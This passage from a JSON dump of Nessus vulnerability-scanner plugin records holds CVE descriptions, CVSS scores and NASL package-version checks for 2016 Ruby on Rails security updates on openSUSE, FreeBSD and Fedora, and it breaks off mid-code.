reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-rails\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-railties\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:32:19", "description": "This update for rubygem-actionpack-3_2, rubygem-activesupport-3_2 fixes the following issues :\n\n - CVE-2015-7576: Timing attack vulnerability in basic authentication in Action Controller (boo#963329)\n\n - CVE-2016-0752: directory traversal and information leak in Action View (boo#963332)\n\n - CVE-2016-0751: rubygem-actionpack: Object Leak DoS (boo#963331)\n\n - CVE-2015-7577: Nested attributes rejection proc bypass (boo#963330)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-3_2 / rubygem-activesupport-3_2 (openSUSE-2016-160)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2016-0751", "CVE-2016-0752"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rubygem-actionpack-3_2", "p-cpe:/a:novell:opensuse:rubygem-activerecord-3_2", "p-cpe:/a:novell:opensuse:rubygem-activesupport-3_2", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-160.NASL", "href": "https://www.tenable.com/plugins/nessus/88613", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-160.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88613);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionpack-3_2 / rubygem-activesupport-3_2 (openSUSE-2016-160)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for rubygem-actionpack-3_2, rubygem-activesupport-3_2\nfixes the following issues :\n\n - CVE-2015-7576: Timing attack vulnerability in basic\n authentication in Action Controller (boo#963329)\n\n - CVE-2016-0752: directory traversal and information leak\n in Action View (boo#963332)\n\n - CVE-2016-0751: rubygem-actionpack: Object Leak DoS\n (boo#963331)\n\n - CVE-2015-7577: Nested attributes rejection proc bypass\n (boo#963330)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963329\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963332\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionpack-3_2 / rubygem-activesupport-3_2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rubygem-actionpack-3_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rubygem-activerecord-3_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rubygem-activesupport-3_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-actionpack-3_2-3.2.17-3.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-activerecord-3_2-3.2.17-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-activesupport-3_2-3.2.17-2.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack-3_2 / rubygem-activerecord-3_2 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:34:25", "description": "Ruby on Rails blog :\n\nRails 4.2.5.2, 4.1.14.2, and 3.2.22.2 have been released! These contain the following important security fixes, and it is recommended that users upgrade as soon as possible.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-07T00:00:00", "type": "nessus", "title": "FreeBSD : rails -- multiple vulnerabilities (5a016dd0-8aa8-490e-a596-55f4cc17e4ef)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionpack", "p-cpe:/a:freebsd:freebsd:rubygem-actionpack4", "p-cpe:/a:freebsd:freebsd:rubygem-actionview", "p-cpe:/a:freebsd:freebsd:rubygem-rails", "p-cpe:/a:freebsd:freebsd:rubygem-rails4", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_5A016DD08AA8490EA59655F4CC17E4EF.NASL", "href": "https://www.tenable.com/plugins/nessus/89708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89708);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n\n script_name(english:\"FreeBSD : rails -- multiple vulnerabilities (5a016dd0-8aa8-490e-a596-55f4cc17e4ef)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby on Rails blog :\n\nRails 4.2.5.2, 4.1.14.2, and 3.2.22.2 have been released! These\ncontain the following important security fixes, and it is recommended\nthat users upgrade as soon as possible.\"\n );\n # https://groups.google.com/d/msg/rubyonrails-security/ddY6HgqB2z4/we0RasMZIAAJ\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2f53d93\"\n );\n # https://groups.google.com/d/msg/rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8279b0b5\"\n );\n # http://weblog.rubyonrails.org/2016/2/29/Rails-4-2-5-2-4-1-14-2-3-2-22-2-have-been-released/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e7354b9a\"\n );\n # https://vuxml.freebsd.org/freebsd/5a016dd0-8aa8-490e-a596-55f4cc17e4ef.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?337f01a2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack<3.2.22.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack4<4.2.5.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview<4.2.5.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails<3.2.22.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails4<4.2.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:34:28", "description": "This update for rubygem-actionpack-3_2 fixes the following issues :\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak Vulnerability in Action View. (boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution vulnerability in Action Pack (boo#968849)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-3_2 (openSUSE-2016-369)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rubygem-actionpack-3_2", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-369.NASL", "href": "https://www.tenable.com/plugins/nessus/90061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-369.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90061);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionpack-3_2 (openSUSE-2016-369)\");\n script_summary(english:\"Check for the openSUSE-2016-369 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-actionpack-3_2 fixes the following issues :\n\n - CVE-2016-2097: rubygem-actionview: Possible Information\n Leak Vulnerability in Action View. (boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code\n execution vulnerability in Action Pack (boo#968849)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968850\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionpack-3_2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rubygem-actionpack-3_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-actionpack-3_2-3.2.17-3.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack-3_2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-01T14:21:18", "description": "Security fix for CVE-2015-7581 CVE-2015-7576 CVE-2016-0751 CVE-2016-0752 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-actionpack-4.2.0-3.fc22 / rubygem-activemodel-4.2.0-2.fc22 (2016-94e71ee673)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:rubygem-activemodel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-94E71EE673.NASL", "href": "https://www.tenable.com/plugins/nessus/89583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-94e71ee673.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89583);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2015-7581\", \"CVE-2016-0751\", \"CVE-2016-0753\");\n script_xref(name:\"FEDORA\", value:\"2016-94e71ee673\");\n\n script_name(english:\"Fedora 22 : rubygem-actionpack-4.2.0-3.fc22 / rubygem-activemodel-4.2.0-2.fc22 (2016-94e71ee673)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7581 CVE-2015-7576 CVE-2016-0751\nCVE-2016-0752 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178042.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?388986a3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1947bae3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rubygem-actionpack and / or rubygem-activemodel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 